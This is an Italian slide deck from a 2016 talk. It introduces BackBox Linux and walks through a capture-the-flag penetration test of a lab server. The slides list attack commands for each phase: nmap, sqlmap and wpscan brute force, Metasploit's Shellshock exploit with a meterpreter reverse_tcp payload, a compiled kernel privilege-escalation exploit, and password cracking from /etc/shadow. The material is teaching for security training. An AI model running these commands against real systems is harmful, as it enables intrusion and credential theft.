Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

BackBox Linux: Simulazione di un Penetration Test e CTF

1,808 views

Published on

La sicurezza informatica sta diventando uno degli aspetti sempre più importanti nell'uso di strumenti digitali con cui abbiamo a che fare ogni giorno.

Il relatore Andrea Draghetti ci mostrerà le cinque fasi principali di un Penetration Test:

Information Gathering
Vulnerability Assessment
Exploitation
Privilege Escalation
Maintaining Access.

Utilizzando alcuni dei software preinstallati in BackBox (il relatore fa parte della community staff del progetto) e sfruttando alcune vulnerabilità, attaccherà un Server Web basato su Ubuntu Linux

Published in: Technology
  • Be the first to comment

BackBox Linux: Simulazione di un Penetration Test e CTF

  1. 1. BackBox Linux Penetration Test and Security Assessment RaspiBO - 23 Febbraio 2016 Simulazione di un Penetration Test Andrea Draghetti
  2. 2. About Me BackBox Team Member Over Security Founder Independent Security Researcher ….
  3. 3. About BackBox BackBox è una distribuzione Free Open Source nata nel 2010 in Italia ed è concepita per gli appassionati di Sicurezza Informatica! Permette di effettuare Penetration Testing e Security Assessment. È basata su Ubuntu, offre oltre 100 Tools dedicati al mondo dell’IT Security, Mobile Analysis, ecc. 
 
 Ha un piano di rilascio previsto ogni 4 mesi e compatibile con ecosistemi a 32 o 64Bit.
  4. 4. Look At The World DistroWatch attesta a BackBox la seconda posizione della sua categoria. È la 56° distro Linux più scaricata al mondo. BackBox 4.5 ha ottenuto oltre 40mila download dal 26 Gennaio 2016 Linux User & Developer - Feb 2016
  5. 5. Screenshot
  6. 6. Follow BackBox backbox.org launchpad.net/~backbox facebook.com/backbox.linux twitter.com/backboxlinux
  7. 7. Penetration Test Il penetration test è un processo di valutazione della sicurezza di un sistema o di una rete che simula l’attacco di un utente malintenzionato. L’analisi viene condotta sfruttando l’intelletto umano e software dedicati, ed ha come obiettivo quello di evidenziare le debolezze del sistema fornendo il maggior numero di informazioni sulle vulnerabilità che hanno permesso l’accesso non autorizzato.
  8. 8. Simulazione di un Penetration Test I. Information Gathering II. Vulnerability Assessment III. Exploitation IV. Privilege Escalation V. Maintaining Access VI. Reporting. Documento completo sulla simulazione di un Penetration Test http://www.isticom.it/documenti/rivista/rivista2013/2013_12_129-134_simulazione_penetration_test.pdf Standard, in fase di definizione, degli elementi fondamentali di un PenTest http://www.pentest-standard.org
  9. 9. Lab: Capture the Flag Capture the Flag, letteralmente “cattura la bandiera”, è una modalità di simulazione del Penetration Testing per allenarsi e migliorare le proprie abilità. vulnhub.com contiene un importante archivio di macchine virtuali preparate per effettuare penetration testing in locale. ctftime.org raggruppa i principali eventi di CTF mondiali e i punteggi dei partecipanti. seeweb.it annualmente organizza una sfida di Hacking con importanti premi in palio.
  10. 10. Lab BackBox Linux Target: hackme.site Flag: /root/flag.txt
  11. 11. Lab: Information Gathering BackBox Linux • Porte • 22 SSH • 80 Apache • Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254 Target: hackme.site
  12. 12. Lab: Vulnerability Assessment BackBox Linux • Porte • 22 SSH • 80 Apache • Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin • Panel • SQL Injection Target: hackme.site • sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254
  13. 13. Lab: Vulnerability Assessment BackBox Linux Target: hackme.site • Porte • 22 SSH • 80 Apache • Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin • Panel • SQL Injection • Wordpress • XSS Vulnerability • No Brute force protection • wpscan -u http://hackme.site/wp --wordlist psw.txt --username admin • wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254
  14. 14. Lab: Exploitation BackBox Linux Target: hackme.site • Porte • 22 SSH • 80 Apache • Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin • Panel • SQL Injection • Wordpress • XSS Vulnerability • No Brute force protection • CGI • Shellshock Vulnerability • shell and more… • exploit • set options … • set PAYLOAD linux/x86/meterpreter/ reverse_tcp • use exploit/multi/http/ apache_mod_cgi_bash_env_exec • msfconsole • wpscan -u http://hackme.site/wp --wordlist psw.txt --username admin • wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254
  15. 15. Lab: Privilege Escalation BackBox Linux Target: hackme.site • Porte • 22 SSH • 80 Apache • Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin • Panel • SQL Injection • Wordpress • XSS Vulnerability • No Brute force protection • CGI • Shellshock Vulnerability • Shell • Kernel Privilege Escalation • extra: john pass • extra: unshadow passwd shadow > pass • cat /root/flag.txt • ./exploit • gcc 18411.c -o exploit • shell and more… • exploit • set options … • set PAYLOAD linux/x86/meterpreter/ reverse_tcp • use exploit/multi/http/ apache_mod_cgi_bash_env_exec • msfconsole • wpscan -u http://hackme.site/wp --wordlist psw.txt --username admin • wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254
  16. 16. Lab BackBox Linux Target: hackme.site Happy Hacking!
  17. 17. Questions? andrea@backbox.org

×